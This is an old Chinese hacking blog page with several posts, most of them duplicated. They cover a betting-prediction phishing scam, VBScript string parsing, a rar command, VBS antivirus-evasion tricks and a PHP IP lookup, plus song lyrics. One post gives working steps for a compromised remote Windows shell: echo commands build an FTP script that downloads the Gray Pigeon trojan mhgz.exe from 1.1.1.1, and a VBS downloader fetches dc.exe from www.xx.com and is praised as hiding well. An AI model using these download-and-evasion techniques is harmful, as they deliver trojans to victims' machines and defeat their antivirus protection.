[转]关于钓鱼式攻击
[
2008/11/26 10:03 | by bigfee ]
2008/11/26 10:03 | by bigfee ]
作者:monyer
有个例子,我也不记得以前说过没有。
钓鱼式攻击是什么东西呢?其实很简单:
某人Email给你:给我500块,预知你的未来,可以提前通知你,明天国王跟火箭队的比赛,火箭队会赢!
你当然不信啦,但是第二天的比赛,火箭队真的赢了,你说:巧合,巧合而已。
过了几天,他又email给你:给我500快,预知你的未来,可以提前通知你,明天湖人跟火箭队的比赛,湖人赢了。
你有点好奇,但你是绝对不会把钱给他的,但是第二天的比赛,湖人真赢了,你说:诶?难道是潜规则?
又过了几天,他又email给你:给我500快,预知你的未来,可以提前通知你,明天湖人跟七六人队的比赛,湖人赢了。
你开始猜,是不是真的啊?但第二天的比赛,湖人又赢了。
......
经过若干次循环后,你终于想要预知你的未来了。但是当你把钱汇出去没有得到答复时,你才知道上当了!
因为事情是这样的:
第一次发信8192封,一半说国王赢,一般说火箭赢;
第二次只给说火箭赢的4096人发信,分为2048人为湖人赢,2048为火箭赢;
第三次只给说湖人赢的2048人发信,分为1024人为湖人赢,1024为七六人赢;
......
很有可能他最终欺骗到的人只有10,但是这已经足够!
所以你可以说钓鱼式攻击一点技术含量都没有,不过可能你仍会因此被骗。
另外钓鱼者超多,请小心诱饵!
有个例子,我也不记得以前说过没有。
钓鱼式攻击是什么东西呢?其实很简单:
某人Email给你:给我500块,预知你的未来,可以提前通知你,明天国王跟火箭队的比赛,火箭队会赢!
你当然不信啦,但是第二天的比赛,火箭队真的赢了,你说:巧合,巧合而已。
过了几天,他又email给你:给我500快,预知你的未来,可以提前通知你,明天湖人跟火箭队的比赛,湖人赢了。
你有点好奇,但你是绝对不会把钱给他的,但是第二天的比赛,湖人真赢了,你说:诶?难道是潜规则?
又过了几天,他又email给你:给我500快,预知你的未来,可以提前通知你,明天湖人跟七六人队的比赛,湖人赢了。
你开始猜,是不是真的啊?但第二天的比赛,湖人又赢了。
......
经过若干次循环后,你终于想要预知你的未来了。但是当你把钱汇出去没有得到答复时,你才知道上当了!
因为事情是这样的:
第一次发信8192封,一半说国王赢,一般说火箭赢;
第二次只给说火箭赢的4096人发信,分为2048人为湖人赢,2048为火箭赢;
第三次只给说湖人赢的2048人发信,分为1024人为湖人赢,1024为七六人赢;
......
很有可能他最终欺骗到的人只有10,但是这已经足够!
所以你可以说钓鱼式攻击一点技术含量都没有,不过可能你仍会因此被骗。
另外钓鱼者超多,请小心诱饵!
转经典论坛(通过实例来实现split的理解)
[ 2008/11/10 16:53 | by bigfee ]
2008/11/10 16:53 | by bigfee ]
最近研究代码变形,其中用到一个split函数,碰巧网上看到篇文章,不错,讲的很详细,所以转过来,希望用到的朋友可以看下
引用
作者:帅青蛙
最初发表于:经典论坛(通过实例来实现split的理解)
版权帅青蛙所有,如有引用,请注明相关信息。
大家有没有碰到过要想取一字符串里的某些值而无从下手?有没有觉得看书或教材对split的写法糊里糊涂……如果有此疑问的话,请看下面我对例子的解释,相信您会对这个有一定的了解。
例如我想取得一个ftp里的用户名及密码(服务器等)值(用IE当FTP时或从表中取出FTP的值)。
下面是我的解决思路:
设url为收到的URL值,这里指:url=ftp://username:password@server,请注意这句话的规律
我想大家都看清楚这个URL里的规律了吧,就是各个部分都被":"给区分成三个部分,即:ftp、//username、password@server
首先将这个URL的各个部分区分开来,用split(url, ":")
以下是具体的代码:
以上是只取用户名的代码,如果你要再取密码的话,可以参考下面。
以上代码为不取服务器地址的代码,如果有取服务器的话,其实也是很简单的
后话,对于要取一字符串中的某些字符或部分,只要抓住规律,再加上用split就可以很好做成各种效果。写此文,希望对大家的学习有所帮助,同时也希望大家能够指点一二!
责任编辑:H.R.M
最初发表于:经典论坛(通过实例来实现split的理解)
版权帅青蛙所有,如有引用,请注明相关信息。
大家有没有碰到过要想取一字符串里的某些值而无从下手?有没有觉得看书或教材对split的写法糊里糊涂……如果有此疑问的话,请看下面我对例子的解释,相信您会对这个有一定的了解。
例如我想取得一个ftp里的用户名及密码(服务器等)值(用IE当FTP时或从表中取出FTP的值)。
下面是我的解决思路:
设url为收到的URL值,这里指:url=ftp://username:password@server,请注意这句话的规律
我想大家都看清楚这个URL里的规律了吧,就是各个部分都被":"给区分成三个部分,即:ftp、//username、password@server
首先将这个URL的各个部分区分开来,用split(url, ":")
以下是具体的代码:
parts = split(url, ":") '此时parts就有三部分,parts(0)=ftp,parts(1)=//username,parts(2)=password@server'接下来剔除没有用到的信息'由于只取username,所以其中parts(0)跟parts(2)是无用的,直接不引用!newname=replace(parts(1), "//", "") '去除//符号,因为这不是username里的内容'此时的newname既为用户名。
以上是只取用户名的代码,如果你要再取密码的话,可以参考下面。
'由于用户名是属于parts(2)里的,而且包含服务器的信息,如果不取服务器,则:newpass = left(parts(2), instr(parts(2),"@")-1) '取值到@之前的位数。此时的newpass取为密码
以上代码为不取服务器地址的代码,如果有取服务器的话,其实也是很简单的
newparts=split(parts(2),"@") '此时newparts分成两部分:newparts(0)为密码,即password;newparts(1)则为服务器地址,即server'如果要输出密码的的话,直接response.write newparts(0)就可以了,服务器就newparts(1)
后话,对于要取一字符串中的某些字符或部分,只要抓住规律,再加上用split就可以很好做成各种效果。写此文,希望对大家的学习有所帮助,同时也希望大家能够指点一二!
责任编辑:H.R.M
cmd命令行下制作rar压缩包
[ 2008/11/08 20:10 | by bigfee ]
2008/11/08 20:10 | by bigfee ]
rar.exe a -k -s -m1 c:\windows\test.rar "C:\program files"
第一个c:\windows\test.rar是作为压缩以后生成的文件
后一个双引号里的意思是打包c盘下program files里面所有的文件
注意:program files后面没有"\"
第一个c:\windows\test.rar是作为压缩以后生成的文件
后一个双引号里的意思是打包c盘下program files里面所有的文件
注意:program files后面没有"\"
网上发现一个朋友中的病毒,看了下,这个病毒里有很多值得学习的地方,呵呵~
360总是查出有木马系统时间经常就变成2001年7月份了,c:\windows\helps\目录下还有bai.bat,help.dll,bai.vbs病毒文件,始终无法删除,会再生。
360总是查出有木马系统时间经常就变成2001年7月份了,c:\windows\helps\目录下还有bai.bat,help.dll,bai.vbs病毒文件,始终无法删除,会再生。
阅读全文...
转:绝世好文!!vbs脚本变形躲避查杀
[ 2008/11/04 15:37 | by bigfee ]
2008/11/04 15:37 | by bigfee ]
【反查杀】
首先必须说明的是,我完全没有试图挑战杀毒软件杀毒能力的意思。Windows脚本是一种解释性语言,明文保存代码。由于没有经过编译过程,代码的复杂程度远不如可执行程序(exe)。exe做不到的事,没理由指望脚本能做到。不过,正因为脚本的反查杀能力很差,以至于杀毒软件使用的查杀办法也不高级。于是我们就有机可乘了。
先看看常见的反查杀办法:
1,字符串或语句的分割/重组。
最典型的例子就是将 fso=createobject("scripting.filesystemobject")
变成 fso=createobject("script"+"ing.filesyste"+"mobject")
这种办法的扩展是用execute语句:
execute("fso=crea"+"teobject(""scr"+"ipting.filesy"+"stemobject"")")
首先必须说明的是,我完全没有试图挑战杀毒软件杀毒能力的意思。Windows脚本是一种解释性语言,明文保存代码。由于没有经过编译过程,代码的复杂程度远不如可执行程序(exe)。exe做不到的事,没理由指望脚本能做到。不过,正因为脚本的反查杀能力很差,以至于杀毒软件使用的查杀办法也不高级。于是我们就有机可乘了。
先看看常见的反查杀办法:
1,字符串或语句的分割/重组。
最典型的例子就是将 fso=createobject("scripting.filesystemobject")
变成 fso=createobject("script"+"ing.filesyste"+"mobject")
这种办法的扩展是用execute语句:
execute("fso=crea"+"teobject(""scr"+"ipting.filesy"+"stemobject"")")
阅读全文...
在远程计算机的CMD环境下,如果不能通过IPC$渠道传送文件,那就只有通过FTP下载文件了。
假设我们已经有一个FTP服务器,上面有一个我们配置好的灰鸽子木马文件mhgz.exe,我们应该知道FTP服务器的三个参数:
1、FTP服务器的IP地址:如1.1.1.1
2、FTP服务器的用户名:如test
3、FTP服务器的密 码:如test123
在远程计算机的CMD下依次输入下面的命令:
1、echo open 1.1.1.1>>test.txt 登陆FTP服务器
2、echo test>>test.txt 用户名
3、echo test123>>test.txt 密码
4、echo bin>>test.txt 开始
5、echo get mhgz.exe>>test.txt 下载灰鸽子木马
6、echo bye>>test.txt 关闭FTP服务器
输入上面命令后,在远程计算机上就会生成一个test.txt文件,内容为:
open 1.1.1.1
test
test123
bin
get mhgz.exe
bye
现在我们在远程计算机上执行下面的命令:
ftp -s:test.txt 意思是,读取test.txt里的参数,执行ftp命令,命令执行完后,灰鸽子木马文件mhgz.exe就下载到对方计算机里了。
大飞的说明:这种方式在windows xp sp2底下,在下载文件时防火墙会提示是否允许文件传输.
方法2:使用vbs脚本,这种方法不会有任何提示,隐蔽性很高!!!!
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.xx.com/dc.exe",0 '下载文件的地址
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\dc.exe",2 '保存文件的路径和文件名
大飞的说明:使用这种方法时,杀毒软件会报有vbs病毒= =!汗死。。。
假设我们已经有一个FTP服务器,上面有一个我们配置好的灰鸽子木马文件mhgz.exe,我们应该知道FTP服务器的三个参数:
1、FTP服务器的IP地址:如1.1.1.1
2、FTP服务器的用户名:如test
3、FTP服务器的密 码:如test123
在远程计算机的CMD下依次输入下面的命令:
1、echo open 1.1.1.1>>test.txt 登陆FTP服务器
2、echo test>>test.txt 用户名
3、echo test123>>test.txt 密码
4、echo bin>>test.txt 开始
5、echo get mhgz.exe>>test.txt 下载灰鸽子木马
6、echo bye>>test.txt 关闭FTP服务器
输入上面命令后,在远程计算机上就会生成一个test.txt文件,内容为:
open 1.1.1.1
test
test123
bin
get mhgz.exe
bye
现在我们在远程计算机上执行下面的命令:
ftp -s:test.txt 意思是,读取test.txt里的参数,执行ftp命令,命令执行完后,灰鸽子木马文件mhgz.exe就下载到对方计算机里了。
大飞的说明:这种方式在windows xp sp2底下,在下载文件时防火墙会提示是否允许文件传输.
方法2:使用vbs脚本,这种方法不会有任何提示,隐蔽性很高!!!!
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.xx.com/dc.exe",0 '下载文件的地址
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\dc.exe",2 '保存文件的路径和文件名
大飞的说明:使用这种方法时,杀毒软件会报有vbs病毒= =!汗死。。。
当你在穿山越岭的另一边
我在孤独的路上没有尽头
一辈子有多少的来不及
发现已经失去
最重要的东西
恍然大悟早已远去
为何总是在犯错之后
才肯相信错的是自己
他们说这就是人生
试著体会试著忍住眼泪
还是躲不开应该有的情绪
我不会奢求世界停止转动
我知道逃避一点都没有用
只是这段时间里尤其在夜里
还是会想起难忘的事情
我想我的思念是一种病
久久不能痊愈
当你在穿山越岭的另一边
我在孤独的路上没有尽头
时常感觉你在耳后的呼吸
却未曾感觉你在心口的鼻息
汲汲营营
忘记身边的人需要爱和关心
藉口总是拉远了距离
不知不觉无声无息
我们总是在抱怨事与愿违
却不愿意回头看看自己
想想自己到底做了甚黱蠢事情
也许是上帝给我一个试炼
只是这伤口需要花点时间
只是会想念过去的一切
那些人事物会离我远去
而我们终究也会远离
变成回忆
oh 思念是一种病
oh 思念是一种病一种病
多久没有说我爱你
多久没有拥抱你所爱的人
当这个世界不在那黱美好
只有爱可以让他更好
我相信一切都来得及
别管那些纷纷扰扰
别让不开心的事停下了脚步
就怕你不说就怕你不做
别让遗憾继续一切都来得及
要去新加坡的郑老板、在美丽新疆的小女人还有跟我在一个城市里的正努力奋斗的胖妞……希望你们都能过得很好:)
我在孤独的路上没有尽头
一辈子有多少的来不及
发现已经失去
最重要的东西
恍然大悟早已远去
为何总是在犯错之后
才肯相信错的是自己
他们说这就是人生
试著体会试著忍住眼泪
还是躲不开应该有的情绪
我不会奢求世界停止转动
我知道逃避一点都没有用
只是这段时间里尤其在夜里
还是会想起难忘的事情
我想我的思念是一种病
久久不能痊愈
当你在穿山越岭的另一边
我在孤独的路上没有尽头
时常感觉你在耳后的呼吸
却未曾感觉你在心口的鼻息
汲汲营营
忘记身边的人需要爱和关心
藉口总是拉远了距离
不知不觉无声无息
我们总是在抱怨事与愿违
却不愿意回头看看自己
想想自己到底做了甚黱蠢事情
也许是上帝给我一个试炼
只是这伤口需要花点时间
只是会想念过去的一切
那些人事物会离我远去
而我们终究也会远离
变成回忆
oh 思念是一种病
oh 思念是一种病一种病
多久没有说我爱你
多久没有拥抱你所爱的人
当这个世界不在那黱美好
只有爱可以让他更好
我相信一切都来得及
别管那些纷纷扰扰
别让不开心的事停下了脚步
就怕你不说就怕你不做
别让遗憾继续一切都来得及
要去新加坡的郑老板、在美丽新疆的小女人还有跟我在一个城市里的正努力奋斗的胖妞……希望你们都能过得很好:)
现在很多朋友上网都用代理,特别是教育网的用户要上外网的时候,那是非代理不能上也。用代理给用户带来了方便,却给网站的统计带来了麻烦。今日发现一个特别有用的变量,那就是$_sever[http_x_forwarded_for]这个变量就可以透过代理获得用户的真实ip地址。
但是同时我们又遇到了一个问题,并不是所有的人都在用着代理服务器上网,所以我们必须要再做一次判断,否则碰到没用代理的用户你的ip值就是空了!
下面写一个简单的函数,用它一般来说可以获得用户的真是ip地址
但是同时我们又遇到了一个问题,并不是所有的人都在用着代理服务器上网,所以我们必须要再做一次判断,否则碰到没用代理的用户你的ip值就是空了!
下面写一个简单的函数,用它一般来说可以获得用户的真是ip地址
阅读全文...
